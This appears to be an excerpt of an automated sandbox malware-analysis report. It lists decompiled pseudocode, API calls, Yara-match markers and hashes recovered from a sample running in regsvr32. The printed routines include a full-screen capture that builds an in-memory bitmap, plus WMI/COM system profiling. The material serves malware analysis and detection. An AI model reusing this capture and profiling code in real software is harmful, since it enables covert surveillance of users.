            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 416a99699eed813a63527157329eed2eabf9a2cda9a6c289b6abbac09fcd6f18
            • Instruction ID: a8d537adba703a09d85395ba6be132989cfe8e3d70b269524275c5e12efb1edd
            • Opcode Fuzzy Hash: 416a99699eed813a63527157329eed2eabf9a2cda9a6c289b6abbac09fcd6f18
            • Instruction Fuzzy Hash: F1F02B3174412596DB197A25688471A3B58AF91760F168491ED14D6DC0FB20DD0045A1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E027ACA1B(void* __ecx) {
            				signed int _v8;
            				intOrPtr _t12;
            				void* _t13;
            				void* _t14;
            				void* _t17;
            				intOrPtr _t18;
            				void* _t23;
            
            				_v8 = _v8 & 0x00000000;
            				_t12 =  *0x27bf8e8; // 0x47ffab0
            				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
            				if(_t13 != 0) {
            					_t14 = E027ACA04(); // executed
            					_t23 = _t14;
            					if(_t23 != 0) {
            						FindCloseChangeNotification(_v8);
            						_t17 = _t23;
            					} else {
            						if(_v8 != _t14) {
            							_t18 =  *0x27bf8e0; // 0x47ff8c0
            							 *((intOrPtr*)(_t18 + 0x30))(_v8);
            						}
            						_t17 = 0;
            					}
            					return _t17;
            				} else {
            					return _t13;
            				}
            			}











            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4b6bfa0359c5610a3ddd3e45019c89e76c3159bb08c9737b449da2d518694386
            • Instruction ID: 214e7d9df84b7883da679e92b674fb094fcbab2a6f6b1691a37bbf688007d901
            • Opcode Fuzzy Hash: 4b6bfa0359c5610a3ddd3e45019c89e76c3159bb08c9737b449da2d518694386
            • Instruction Fuzzy Hash: 12F01732A50108FBCF12DBA4D916FAD73E8FB44699B104599E502E7550DB34DA00EB95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E027A63DE() {
            				intOrPtr _t3;
            
            				_t3 =  *0x27bf8e0; // 0x47ff8c0
            				 *((intOrPtr*)(_t3 + 0x2c))( *0x27bf904, 0xffffffff);
            				ExitProcess(0);
            			}





            APIs
            • ExitProcess.KERNEL32(00000000), ref: 027A63F5
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: b0f225fe550a649d869504ecc194ee86771c423e97028b89e7cbeb9ba0088c3f
            • Instruction ID: 814fe0ff14adbee501df4793cd49dc98b6db3422a25598da88562b7021c04595
            • Opcode Fuzzy Hash: b0f225fe550a649d869504ecc194ee86771c423e97028b89e7cbeb9ba0088c3f
            • Instruction Fuzzy Hash: 00C002715550109FCB415B68DD49F1437E0FB4C761F158E54F519D65E5CB3455109B01
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E027A8D70(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x27bf9c8, 8, _a4); // executed
            				return _t2;
            			}





            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,?,027A973A,00000100,?,027A65BF), ref: 027A8D7E
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 21254b06aed1f1bacbe74b1cc2481c0356e44c9e3f9a1df1219402fed6eeb921
            • Instruction ID: f13db4d6ef5c8522e6ec4e0c6b47886d69b7e7d9da9cfac14164ff1da4638a01
            • Opcode Fuzzy Hash: 21254b06aed1f1bacbe74b1cc2481c0356e44c9e3f9a1df1219402fed6eeb921
            • Instruction Fuzzy Hash: B5B092358C0208FBCF021E81EC05F843F29EB08B51F008411F708484608A7364709FA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E027ADB5A(void* __ecx) {
            				signed int _t4;
            
            				_t4 = ResumeThread( *(__ecx + 4));
            				asm("sbb eax, eax");
            				return  ~_t4 & 0x00000001;
            			}





            APIs
            • ResumeThread.KERNELBASE(?,027AD9C5,?,?,00000001), ref: 027ADB62
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: a48d372895475ca2e1ae41b3b4e7371a31cf3eb24a804050eb6525d384a07c59
            • Instruction ID: c03304f9ac6c471ad0e868628d6f1b68fa3497f2b28732fabf095d0e2594c8e2
            • Opcode Fuzzy Hash: a48d372895475ca2e1ae41b3b4e7371a31cf3eb24a804050eb6525d384a07c59
            • Instruction Fuzzy Hash: 57B092322A00019BCB015B78DC0BEA03BE0FB56A067A8CAE4F005C6461C22EC4559A40
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E027A8D5B() {
            				void* _t1;
            
            				_t1 = HeapCreate(0, 0x96000, 0); // executed
            				 *0x27bf9c8 = _t1;
            				return _t1;
            			}





            APIs
            • HeapCreate.KERNELBASE(00000000,00096000,00000000,027A65BA), ref: 027A8D64
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: bdcf511707d86d7332bd357ac7793486fa6b16ff7918ba990f98fa31abfdc492
            • Instruction ID: 2d80acf31b9388965ca694b34675ac19ce0051a0f4d32a9b8dfc517007e7b1b6
            • Opcode Fuzzy Hash: bdcf511707d86d7332bd357ac7793486fa6b16ff7918ba990f98fa31abfdc492
            • Instruction Fuzzy Hash: 5DB01270EC1300F6DB510F205C46F0035106344F02F208402F709981C0C6B010209D15
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 91%
            			E027ADB70(void* __ecx, intOrPtr _a4, signed int _a8) {
            				signed int _v8;
            				intOrPtr _v12;
            				signed int _t26;
            				signed int _t28;
            				signed int* _t36;
            				signed int* _t39;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t36 = _a8;
            				_t28 = _t36[1];
            				if(_t28 != 0) {
            					_t39 = _t36[2];
            					do {
            						_a8 = _a8 & 0x00000000;
            						if(_t39[2] > 0) {
            							_t31 = _t39[3];
            							_t22 = _a4 + 0x24;
            							_v12 = _a4 + 0x24;
            							_v8 = _t39[3];
            							while(E027AA240(_t22,  *_t31) != 0) {
            								_t26 = _a8 + 1;
            								_t31 = _v8 + 4;
            								_a8 = _t26;
            								_t22 = _v12;
            								_v8 = _v8 + 4;
            								if(_t26 < _t39[2]) {
            									continue;
            								} else {
            								}
            								goto L8;
            							}
            							 *_t36 =  *_t36 |  *_t39;
            						}
            						L8:
            						_t39 =  &(_t39[4]);
            						_t28 = _t28 - 1;
            					} while (_t28 != 0);
            				}
            				Sleep(0xa);
            				return 1;
            			}










            APIs
            • Sleep.KERNELBASE(0000000A), ref: 027ADBD9
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 084b3cf0b09598eb726ed8ac4790d24f285529aebbc3cd385a31814a3f99d913
            • Instruction ID: f6efe567c338e74487a40a7f1fce4d934c59ce7e67a507f497c59cea6b73da50
            • Opcode Fuzzy Hash: 084b3cf0b09598eb726ed8ac4790d24f285529aebbc3cd385a31814a3f99d913
            • Instruction Fuzzy Hash: 23111B71A01205EFEB24CF99D895B99B7F8FB88325F10896AE85A9B740D774E940CB40
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E027A5CC4(int* __ecx) {
            				signed int _v8;
            				char _v12;
            				int _v16;
            				struct HWND__* _v20;
            				struct HWND__* _v24;
            				struct HDC__* _v28;
            				void* _v32;
            				int* _v36;
            				void* _v40;
            				void* _v44;
            				void* _v48;
            				void* _v52;
            				void* _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				short _v82;
            				short _v84;
            				signed int _v88;
            				signed int _v92;
            				struct tagBITMAPINFO _v96;
            				intOrPtr _v102;
            				int _v110;
            				char _v112;
            				void* _v116;
            				void* _v120;
            				void* _v124;
            				void* _v132;
            				void* _v136;
            				void* _v140;
            				int _v156;
            				signed int _v160;
            				void _v164;
            				int _t82;
            				void* _t84;
            				signed int _t92;
            				void* _t99;
            				char _t103;
            				intOrPtr _t113;
            				int* _t114;
            				struct HDC__* _t120;
            				signed int _t124;
            				short _t137;
            				struct HDC__* _t141;
            				void* _t144;
            				void* _t148;
            
            				_v36 = __ecx;
            				_v24 = 0;
            				_t120 = 0;
            				_v12 = 0;
            				_t144 = 0;
            				_v20 = 0;
            				_t141 = GetDC(0);
            				_v28 = _t141;
            				if(_t141 != 0) {
            					_t120 = CreateCompatibleDC(_t141);
            					if(_t120 != 0) {
            						_v8 = GetDeviceCaps(_t141, 8);
            						_t82 = GetDeviceCaps(_t141, 0xa);
            						_v16 = _t82;
            						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
            						if(_t144 != 0) {
            							_t84 = SelectObject(_t120, _t144);
            							_v32 = _t84;
            							if(_t84 != 0) {
            								_t144 = SelectObject(_t120, _v32);
            								if(_t144 != 0) {
            									GetObjectW(_t144, 0x18,  &_v164);
            									_t92 = _v160;
            									_t124 = _v156;
            									_v92 = _t92;
            									_v84 = 1;
            									_t137 = 0x20;
            									_v82 = _t137;
            									_v96.bmiHeader = 0x28;
            									_v80 = 0;
            									_v76 = 0;
            									_v72 = 0;
            									_v68 = 0;
            									_v64 = 0;
            									_v60 = 0;
            									asm("cdq");
            									_v88 = _t124;
            									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
            									_t99 = E027A8D70(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
            									_v20 = _t99;
            									if(_t99 != 0) {
            										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
            										_v16 = _v8 + 0x36;
            										_t103 = E027A8D70(_v8 + 0x36);
            										_v12 = _t103;
            										if(_t103 != 0) {
            											_v110 = _v16;
            											_v112 = 0x4d42;
            											_v102 = 0x36;
            											E027A8E4D(_t103,  &_v112, 0xe);
            											E027A8E4D(_v12 + 0xe,  &_v96, 0x28);
            											E027A8E4D(_v12 + 0x36, _v20, _v8);
            											_t148 = _t148 + 0x24;
            											_v8 = _v8 & 0x00000000;
            											_t113 = E027AFC7B(_v12, _v16,  &_v8);
            											_v24 = _t113;
            											if(_t113 != 0) {
            												_t114 = _v36;
            												if(_t114 != 0) {
            													 *_t114 = _v8;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				E027A8D86( &_v20, 0);
            				E027A8D86( &_v12, 0);
            				if(_t120 != 0) {
            					DeleteDC(_t120);
            				}
            				if(_t141 != 0) {
            					DeleteDC(_t141);
            				}
            				if(_t144 != 0) {
            					DeleteObject(_t144);
            				}
            				return _v24;
            			}





















































            APIs
            • GetDC.USER32(00000000), ref: 027A5CE3
            • CreateCompatibleDC.GDI32(00000000), ref: 027A5CF7
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 027A5D10
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 027A5D18
            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 027A5D22
            • SelectObject.GDI32(00000000,00000000), ref: 027A5D34
            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 027A5D58
            • GetCursorInfo.USER32(?), ref: 027A5D69
            • CopyIcon.USER32 ref: 027A5D7E
            • GetIconInfo.USER32(00000000,?), ref: 027A5D8C
            • GetObjectW.GDI32(?,00000018,?), ref: 027A5DAA
            • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 027A5DC2
            • SelectObject.GDI32(00000000,?), ref: 027A5DCF
            • GetObjectW.GDI32(00000000,00000018,?), ref: 027A5DE9
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 027A5E65
            • DeleteDC.GDI32(00000000), ref: 027A5F16
            • DeleteDC.GDI32(00000000), ref: 027A5F21
            • DeleteObject.GDI32(00000000), ref: 027A5F2C
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
            • String ID: ($6
            • API String ID: 192358524-4149066357
            • Opcode ID: 4c35caa6a6d36d1c1b2185ad34a69cd4ca5f0228ad93b3072a75f3b7ebb87a0e
            • Instruction ID: 4be966c6c98a3153e9c0239a9e04d490b32f7e6d5eb785cdafcaa5cc7a330c01
            • Opcode Fuzzy Hash: 4c35caa6a6d36d1c1b2185ad34a69cd4ca5f0228ad93b3072a75f3b7ebb87a0e
            • Instruction Fuzzy Hash: 1D8128B2D00219EBDB21CBA5CC59FAEBBB9EF49310F548559E614F7240EB309A05CF60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 30%
            			E027AE503(void* __ecx) {
            				char _v8;
            				void* _v12;
            				char* _t15;
            				intOrPtr* _t16;
            				void* _t21;
            				intOrPtr* _t23;
            				intOrPtr* _t24;
            				intOrPtr* _t25;
            				void* _t30;
            				void* _t33;
            
            				_v12 = 0;
            				_v8 = 0;
            				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
            				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
            				_t15 =  &_v12;
            				__imp__CoCreateInstance(0x27bc8a0, 0, 1, 0x27bc8b0, _t15);
            				if(_t15 < 0) {
            					L5:
            					_t23 = _v8;
            					if(_t23 != 0) {
            						 *((intOrPtr*)( *_t23 + 8))(_t23);
            					}
            					_t24 = _v12;
            					if(_t24 != 0) {
            						 *((intOrPtr*)( *_t24 + 8))(_t24);
            					}
            					_t16 = 0;
            				} else {
            					__imp__#2(__ecx);
            					_t25 = _v12;
            					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
            					if(_t21 < 0) {
            						goto L5;
            					} else {
            						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
            						if(_t21 < 0) {
            							goto L5;
            						} else {
            							_t16 = E027A8D70(8);
            							if(_t16 == 0) {
            								goto L5;
            							} else {
            								 *((intOrPtr*)(_t16 + 4)) = _v12;
            								 *_t16 = _v8;
            							}
            						}
            					}
            				}
            				return _t16;
            			}














            APIs
            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE516
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE527
            • CoCreateInstance.OLE32(027BC8A0,00000000,00000001,027BC8B0,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE53E
            • SysAllocString.OLEAUT32(00000000), ref: 027AE549
            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE574
              • Part of subcall function 027A8D70: RtlAllocateHeap.NTDLL(00000008,?,?,027A973A,00000100,?,027A65BF), ref: 027A8D7E
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
            • String ID:
            • API String ID: 1610782348-0
            • Opcode ID: 0d8d24aae4f0e33e6ab347eb8d47c14d2a4213e650695d0d1bcc2c654cb1e51e
            • Instruction ID: 0ab7347a7246871b736583cae3d61a5ec62fdbb7bdcee680efdbec345daa6f88
            • Opcode Fuzzy Hash: 0d8d24aae4f0e33e6ab347eb8d47c14d2a4213e650695d0d1bcc2c654cb1e51e
            • Instruction Fuzzy Hash: 39211A70B00255BBEB258F52DC5DEAFBF7CEFC6B24F1041ADB615A6290D6709A00DA70
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E027ADE65(void* __ecx) {
            				struct _SYSTEM_INFO _v40;
            				void* _t5;
            
            				if(__ecx == 0) {
            					GetSystemInfo( &_v40);
            					return _v40.dwOemId & 0x0000ffff;
            				} else {
            					_t5 = 9;
            					return _t5;
            				}
            			}






            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,027AE23E), ref: 027ADE78
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: 430f5e50e3f9067ddfc623882b7dab5bc7752958f7f882d4acba4668494b0438
            • Instruction ID: 8b684cc03512208b36121bc20af725e2ec3ae9c2ce103bb4675c9a8b9aa5656e
            • Opcode Fuzzy Hash: 430f5e50e3f9067ddfc623882b7dab5bc7752958f7f882d4acba4668494b0438
            • Instruction Fuzzy Hash: 67C01271A0420A96CF5597A5A516AAA72F85B4450DF100595EE02F10C1E660DD514660
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E027AEB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				char _v24;
            				void* _v28;
            				signed int _v32;
            				char _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				char _v48;
            				char _v52;
            				intOrPtr _v56;
            				signed int _v60;
            				char* _v72;
            				signed short _v80;
            				signed int _v84;
            				char _v88;
            				char _v92;
            				char _v96;
            				intOrPtr _v100;
            				char _v104;
            				char _v616;
            				intOrPtr* _t159;
            				char _t165;
            				signed int _t166;
            				signed int _t173;
            				signed int _t178;
            				signed int _t186;
            				intOrPtr* _t187;
            				signed int _t188;
            				signed int _t192;
            				intOrPtr* _t193;
            				intOrPtr _t200;
            				intOrPtr* _t205;
            				signed int _t207;
            				signed int _t209;
            				intOrPtr* _t210;
            				intOrPtr _t212;
            				intOrPtr* _t213;
            				signed int _t214;
            				char _t217;
            				signed int _t218;
            				signed int _t219;
            				signed int _t230;
            				signed int _t235;
            				signed int _t242;
            				signed int _t243;
            				signed int _t244;
            				signed int _t245;
            				intOrPtr* _t247;
            				intOrPtr* _t251;
            				signed int _t252;
            				intOrPtr* _t253;
            				void* _t255;
            				intOrPtr* _t261;
            				signed int _t262;
            				signed int _t283;
            				signed int _t289;
            				char* _t298;
            				void* _t320;
            				signed int _t322;
            				intOrPtr* _t323;
            				intOrPtr _t324;
            				signed int _t327;
            				intOrPtr* _t328;
            				intOrPtr* _t329;
            
            				_v32 = _v32 & 0x00000000;
            				_v60 = _v60 & 0x00000000;
            				_v56 = __edx;
            				_v100 = __ecx;
            				_t159 = E027AE503(__ecx);
            				_t251 = _t159;
            				_v104 = _t251;
            				if(_t251 == 0) {
            					return _t159;
            				}
            				_t320 = E027A8D70(0x10);
            				_v36 = _t320;
            				_pop(_t255);
            				if(_t320 == 0) {
            					L53:
            					E027A8D86( &_v60, 0xfffffffe);
            					E027AE5B7( &_v104);
            					return _t320;
            				}
            				_t165 = E027A9F8F(_t255, 0x30f);
            				 *_t328 = 0x2ad;
            				_v52 = _t165;
            				_t166 = E027A9F8F(_t255);
            				_push(0);
            				_push(_v56);
            				_v20 = _t166;
            				_push(_t166);
            				_push(_a4);
            				_t322 = E027A9BF7(_t165);
            				_v60 = _t322;
            				E027A8D41( &_v52);
            				E027A8D41( &_v20);
            				_t329 = _t328 + 0x20;
            				if(_t322 != 0) {
            					_t323 = __imp__#2;
            					_v40 =  *_t323(_t322);
            					_t173 = E027A9F8F(_t255, 0x103e);
            					_v20 = _t173;
            					_v52 =  *_t323(_t173);
            					E027A8D41( &_v20);
            					_t324 = _v40;
            					_t261 =  *_t251;
            					_t252 = 0;
            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
            					__eflags = _t178;
            					if(_t178 != 0) {
            						L52:
            						__imp__#6(_t324);
            						__imp__#6(_v52);
            						goto L53;
            					}
            					_t262 = _v32;
            					_v28 = 0;
            					_v20 = 0;
            					__eflags = _t262;
            					if(_t262 == 0) {
            						L49:
            						 *((intOrPtr*)( *_t262 + 8))(_t262);
            						__eflags = _t252;
            						if(_t252 == 0) {
            							E027A8D86( &_v36, 0);
            							_t320 = _v36;
            						} else {
            							 *(_t320 + 8) = _t252;
            							 *_t320 = E027A9A5A(_v100);
            							 *((intOrPtr*)(_t320 + 4)) = E027A9A5A(_v56);
            						}
            						goto L52;
            					} else {
            						goto L6;
            					}
            					while(1) {
            						L6:
            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
            						__eflags = _t186;
            						if(_t186 != 0) {
            							break;
            						}
            						_v16 = 0;
            						_v48 = 0;
            						_v12 = 0;
            						_v24 = 0;
            						__eflags = _v84;
            						if(_v84 == 0) {
            							break;
            						}
            						_t187 = _v28;
            						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
            						__eflags = _t188;
            						if(_t188 >= 0) {
            							__imp__#20(_v24, 1,  &_v16);
            							__imp__#19(_v24, 1,  &_v48);
            							_t46 = _t320 + 0xc; // 0xc
            							_t253 = _t46;
            							_t327 = _t252 << 3;
            							_t47 = _t327 + 8; // 0x8
            							_t192 = E027A8E04(_t327, _t47);
            							__eflags = _t192;
            							if(_t192 == 0) {
            								__imp__#16(_v24);
            								_t193 = _v28;
            								 *((intOrPtr*)( *_t193 + 8))(_t193);
            								L46:
            								_t252 = _v20;
            								break;
            							}
            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E027A8D70( *(_t327 +  *_t253) << 3);
            							_t200 =  *_t253;
            							__eflags =  *(_t327 + _t200 + 4);
            							if( *(_t327 + _t200 + 4) == 0) {
            								_t136 = _t320 + 0xc; // 0xc
            								E027A8D86(_t136, 0);
            								E027A8D86( &_v36, 0);
            								__imp__#16(_v24);
            								_t205 = _v28;
            								 *((intOrPtr*)( *_t205 + 8))(_t205);
            								_t320 = _v36;
            								goto L46;
            							}
            							_t207 = _v16;
            							while(1) {
            								_v12 = _t207;
            								__eflags = _t207 - _v48;
            								if(_t207 > _v48) {
            									break;
            								}
            								_v44 = _v44 & 0x00000000;
            								_t209 =  &_v12;
            								__imp__#25(_v24, _t209,  &_v44);
            								__eflags = _t209;
            								if(_t209 < 0) {
            									break;
            								}
            								_t212 = E027A9A5A(_v44);
            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
            								_t213 = _v28;
            								_t281 =  *_t213;
            								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
            								__eflags = _t214;
            								if(_t214 < 0) {
            									L39:
            									__imp__#6(_v44);
            									_t207 = _v12 + 1;
            									__eflags = _t207;
            									continue;
            								}
            								_v92 = E027A9F8F(_t281, 0x3f4);
            								 *_t329 = 0x1b4;
            								_t217 = E027A9F8F(_t281);
            								_t283 = _v80;
            								_v96 = _t217;
            								_t218 = _t283 & 0x0000ffff;
            								__eflags = _t218 - 0xb;
            								if(__eflags > 0) {
            									_t219 = _t218 - 0x10;
            									__eflags = _t219;
            									if(_t219 == 0) {
            										L35:
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E027A8D70(0x18);
            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
            										__eflags = _t289;
            										if(_t289 == 0) {
            											L38:
            											E027A8D41( &_v92);
            											E027A8D41( &_v96);
            											__imp__#9( &_v80);
            											goto L39;
            										}
            										_push(_v72);
            										_push(L"%d");
            										L37:
            										_push(0xc);
            										_push(_t289);
            										E027A9FEE();
            										_t329 = _t329 + 0x10;
            										goto L38;
            									}
            									_t230 = _t219 - 1;
            									__eflags = _t230;
            									if(_t230 == 0) {
            										L33:
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E027A8D70(0x18);
            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
            										__eflags = _t289;
            										if(_t289 == 0) {
            											goto L38;
            										}
            										_push(_v72);
            										_push(L"%u");
            										goto L37;
            									}
            									_t235 = _t230 - 1;
            									__eflags = _t235;
            									if(_t235 == 0) {
            										goto L33;
            									}
            									__eflags = _t235 == 1;
            									if(_t235 == 1) {
            										goto L33;
            									}
            									L28:
            									__eflags = _t283 & 0x00002000;
            									if((_t283 & 0x00002000) == 0) {
            										_v88 = E027A9F8F(_t283, 0x12c);
            										E027A9FEE( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
            										E027A8D41( &_v88);
            										_t329 = _t329 + 0x18;
            										_t298 =  &_v616;
            										L31:
            										_t242 = E027A9A5A(_t298);
            										L32:
            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
            										goto L38;
            									}
            									_t242 = E027AEA2B( &_v80);
            									goto L32;
            								}
            								if(__eflags == 0) {
            									__eflags = _v72 - 0xffff;
            									_t298 = L"TRUE";
            									if(_v72 != 0xffff) {
            										_t298 = L"FALSE";
            									}
            									goto L31;
            								}
            								_t243 = _t218 - 1;
            								__eflags = _t243;
            								if(_t243 == 0) {
            									goto L38;
            								}
            								_t244 = _t243 - 1;
            								__eflags = _t244;
            								if(_t244 == 0) {
            									goto L35;
            								}
            								_t245 = _t244 - 1;
            								__eflags = _t245;
            								if(_t245 == 0) {
            									goto L35;
            								}
            								__eflags = _t245 != 5;
            								if(_t245 != 5) {
            									goto L28;
            								}
            								_t298 = _v72;
            								goto L31;
            							}
            							__imp__#16(_v24);
            							_t210 = _v28;
            							 *((intOrPtr*)( *_t210 + 8))(_t210);
            							_t252 = _v20;
            							L42:
            							_t262 = _v32;
            							_t252 = _t252 + 1;
            							_v20 = _t252;
            							__eflags = _t262;
            							if(_t262 != 0) {
            								continue;
            							}
            							L48:
            							_t324 = _v40;
            							goto L49;
            						}
            						_t247 = _v28;
            						 *((intOrPtr*)( *_t247 + 8))(_t247);
            						goto L42;
            					}
            					_t262 = _v32;
            					goto L48;
            				} else {
            					E027A8D86( &_v36, _t322);
            					_t320 = _v36;
            					goto L53;
            				}
            			}

            APIs
              • Part of subcall function 027AE503: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE516
              • Part of subcall function 027AE503: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE527
              • Part of subcall function 027AE503: CoCreateInstance.OLE32(027BC8A0,00000000,00000001,027BC8B0,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE53E
